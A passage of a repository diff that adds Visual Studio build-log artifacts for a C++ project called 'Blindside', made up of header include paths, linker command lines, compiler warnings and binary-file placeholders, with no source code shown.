     149 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\UNKNWN.H
     150 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROPIDLBASE.H
     151 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OAIDL.H
     152 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\URLMON.H
     153 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OLEIDL.H
     154 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\SERVPROV.H
     155 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MSXML.H
     156 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\PROPIDL.H
     157 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\OLEAUTO.H
     158 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\COMMDLG.H
     159 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\STRALIGN.H
     160 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINSVC.H
     161 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\MCX.H
     162 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\IMM.H
     163 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\IME_CMODES.H
     164 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\IOSTREAM
     165 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\YVALS_CORE.H
     166 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XKEYCHECK.H
     167 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ISTREAM
     168 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\OSTREAM
     169 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\IOS
     170 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XLOCNUM
     171 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CLIMITS
     172 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CMATH
     173 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\YVALS.H
     174 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CRTDBG.H
     175 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_NEW_DEBUG.H
     176 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_NEW.H
     177 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CRTDEFS.H
     178 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\USE_ANSI.H
     179 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDLIB
     180 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\MATH.H
     181 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MATH.H
     182 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XTR1COMMON
     183 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\INTRIN0.H
     184 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\INTRIN0.INL.H
     185 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDIO
     186 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STDIO.H
     187 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WSTDIO.H
     188 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_STDIO_CONFIG.H
     189 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ITERATOR
     190 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\IOSFWD
     191 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTRING
     192 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CWCHAR
     193 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\WCHAR.H
     194 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WCONIO.H
     195 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WDIRECT.H
     196 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WIO.H
     197 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_SHARE.H
     198 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WPROCESS.H
     199 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WTIME.H
     200 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\SYS\STAT.H
     201 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\SYS\TYPES.H
     202 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XSTDDEF
     203 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDDEF
     204 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\INITIALIZER_LIST
     205 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XUTILITY
     206 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\UTILITY
     207 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\TYPE_TRAITS
     208 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CSTDINT
     209 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STDINT.H
     210 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STREAMBUF
     211 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XIOSBASE
     212 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\SHARE.H
     213 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\SYSTEM_ERROR
     214 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\__MSVC_SYSTEM_ERROR_ABI.HPP
     215 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CERRNO
     216 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STDEXCEPT
     217 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\EXCEPTION
     218 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\MALLOC.H
     219 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_EXCEPTION.H
     220 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\EH.H
     221 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_TERMINATE.H
     222 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XSTRING
     223 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XMEMORY
     224 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\LIMITS
     225 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CFLOAT
     226 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\FLOAT.H
     227 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ISA_AVAILABILITY.H
     228 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\NEW
     229 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XATOMIC.H
     230 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XCALL_ONCE.H
     231 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XERRC.H
     232 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\ATOMIC
     233 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XTHREADS.H
     234 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XTIMEC.H
     235 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CTIME
     236 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\TIME.H
     237 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XLOCALE
     238 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\MEMORY
     239 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\TYPEINFO
     240 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME_TYPEINFO.H
     241 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XFACET
     242 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XLOCINFO
     243 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\__MSVC_XLOCINFO_TYPES.HPP
     244 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CCTYPE
     245 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CLOCALE
     246 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\LOCALE.H
     247 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\UNORDERED_MAP
     248 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XHASH
     249 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\LIST
     250 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\TUPLE
     251 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VECTOR
     252 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\XBIT_OPS.H
     253 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\HELPERS.H
     254 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\FUNCTIONAL
     255 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\STEALTH.H
     256 + 
  • ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.tlog/CL.write.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     2 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\VC143.PDB
     3 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\VC143.IDB
     4 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\BLINDSIDE.OBJ
     5 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.tlog/link.command.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\BLINDSIDE.OBJ
     2 +/OUT:"C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\DEBUG\BLINDSIDE.EXE" /INCREMENTAL /ILK:"X64\DEBUG\BLINDSIDE.ILK" /NOLOGO KERNEL32.LIB USER32.LIB GDI32.LIB WINSPOOL.LIB COMDLG32.LIB ADVAPI32.LIB SHELL32.LIB OLE32.LIB OLEAUT32.LIB UUID.LIB ODBC32.LIB ODBCCP32.LIB /MANIFEST /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:"C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\DEBUG\BLINDSIDE.PDB" /SUBSYSTEM:CONSOLE /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\DEBUG\BLINDSIDE.LIB" /MACHINE:X64 X64\DEBUG\BLINDSIDE.OBJ
     3 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.tlog/link.read.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\BLINDSIDE.OBJ
     2 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\KERNEL32.LIB
     3 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\USER32.LIB
     4 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\GDI32.LIB
     5 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\WINSPOOL.LIB
     6 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\COMDLG32.LIB
     7 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\ADVAPI32.LIB
     8 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\SHELL32.LIB
     9 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\OLE32.LIB
     10 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\OLEAUT32.LIB
     11 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\UUID.LIB
     12 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\ODBC32.LIB
     13 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UM\X64\ODBCCP32.LIB
     14 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\BLINDSIDE.OBJ
     15 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\BLINDSIDE.ILK
     16 +C:\WINDOWS\SYSTEM32\TZRES.DLL
     17 +C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
     18 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\MSVCPRTD.LIB
     19 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\MSVCRTD.LIB
     20 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\OLDNAMES.LIB
     21 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\LIB\X64\VCRUNTIMED.LIB
     22 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\LIB\10.0.19041.0\UCRT\X64\UCRTD.LIB
     23 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\VC143.PDB
     24 + 
  • ■ ■ ■ ■ ■
    Blindside/x64/Debug/Blindside.tlog/link.write.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\BLINDSIDE.OBJ
     2 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\DEBUG\BLINDSIDE.EXE
     3 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\X64\DEBUG\BLINDSIDE.ILK
     4 +C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\X64\DEBUG\BLINDSIDE.PDB
     5 + 
  • Blindside/x64/Debug/vc143.idb
    Binary file.
  • Blindside/x64/Debug/vc143.pdb
    Binary file.
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.exe.recipe
     1 +<?xml version="1.0" encoding="utf-8"?>
     2 +<Project>
     3 + <ProjectOutputs>
     4 + <ProjectOutput>
     5 + <FullPath>C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\x64\Release\Blindside.exe</FullPath>
     6 + </ProjectOutput>
     7 + </ProjectOutputs>
     8 + <ContentFiles />
     9 + <SatelliteDlls />
     10 + <NonRecipeFileRefs />
     11 +</Project>
  • Blindside/x64/Release/Blindside.iobj
    Binary file.
  • Blindside/x64/Release/Blindside.ipdb
    Binary file.
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.log
     1 + Blindside.cpp
     2 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(75,4): warning C5033: 'register' is no longer a supported storage class
     3 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(162,113): warning C4305: 'argument': truncation from '__int64' to 'DWORD'
     4 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(162,101): warning C4309: 'argument': truncation of constant value
     5 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(264,9): warning C4477: 'printf' : format string '%p' requires an argument of type 'void *', but variadic argument 1 has type 'size_t'
     6 +C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\Blindside\Blindside.cpp(273,9): warning C4477: 'printf' : format string '%p' requires an argument of type 'void *', but variadic argument 1 has type 'size_t'
     7 + Generating code
     8 + 1 of 16 functions ( 6.3%) were compiled, the rest were copied from previous compilation.
     9 + 0 functions were new in current compilation
     10 + 5 functions had inline decision re-evaluated but remain unchanged
     11 + Finished generating code
     12 + Blindside.vcxproj -> C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\x64\Release\Blindside.exe
     13 + 
  • Blindside/x64/Release/Blindside.obj
    Binary file.
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.tlog/Blindside.lastbuildstate
     1 +PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.32.31326:TargetPlatformVersion=10.0.19041.0:
     2 +Release|x64|C:\Users\ilanka.CYMRESEARCH\source\repos\Blindside\|
     3 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.tlog/CL.command.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     2 +/c /Zi /nologo /W3 /WX- /diagnostics:column /sdl /O2 /Oi /GL /D NDEBUG /D _CONSOLE /D _CRT_SECURE_NO_WARNINGS /D _UNICODE /D UNICODE /Gm- /EHsc /MD /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /std:c++latest /permissive- /Fo"X64\RELEASE\\" /Fd"X64\RELEASE\VC143.PDB" /external:W3 /Gd /TP /FC C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     3 + 
  • ■ ■ ■ ■ ■ ■
    Blindside/x64/Release/Blindside.tlog/CL.read.1.tlog
     1 +^C:\USERS\ILANKA.CYMRESEARCH\SOURCE\REPOS\BLINDSIDE\BLINDSIDE\BLINDSIDE.CPP
     2 +C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
     3 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\BIN\HOSTX64\X64\1033\CLUI.DLL
     4 +C:\WINDOWS\SYSTEM32\TZRES.DLL
     5 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINDOWS.H
     6 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINAPIFAMILY.H
     7 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINPACKAGEFAMILY.H
     8 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SDKDDKVER.H
     9 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\EXCPT.H
     10 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VCRUNTIME.H
     11 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\SAL.H
     12 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\CONCURRENCYSAL.H
     13 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\VADEFS.H
     14 +C:\PROGRAM FILES\MICROSOFT VISUAL STUDIO\2022\COMMUNITY\VC\TOOLS\MSVC\14.32.31326\INCLUDE\STDARG.H
     15 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\WINDEF.H
     16 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\MINWINDEF.H
     17 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SPECSTRINGS.H
     18 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SPECSTRINGS_STRICT.H
     19 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SPECSTRINGS_UNDEF.H
     20 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\DRIVERSPECS.H
     21 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\SDV_DRIVERSPECS.H
     22 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UM\WINNT.H
     23 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CTYPE.H
     24 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT.H
     25 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_WCTYPE.H
     26 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\KERNELSPECS.H
     27 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\BASETSD.H
     28 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\SHARED\GUIDDEF.H
     29 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\STRING.H
     30 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MEMORY.H
     31 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\CORECRT_MEMCPY_S.H
     32 +C:\PROGRAM FILES (X86)\WINDOWS KITS\10\INCLUDE\10.0.19041.0\UCRT\ERRNO.H
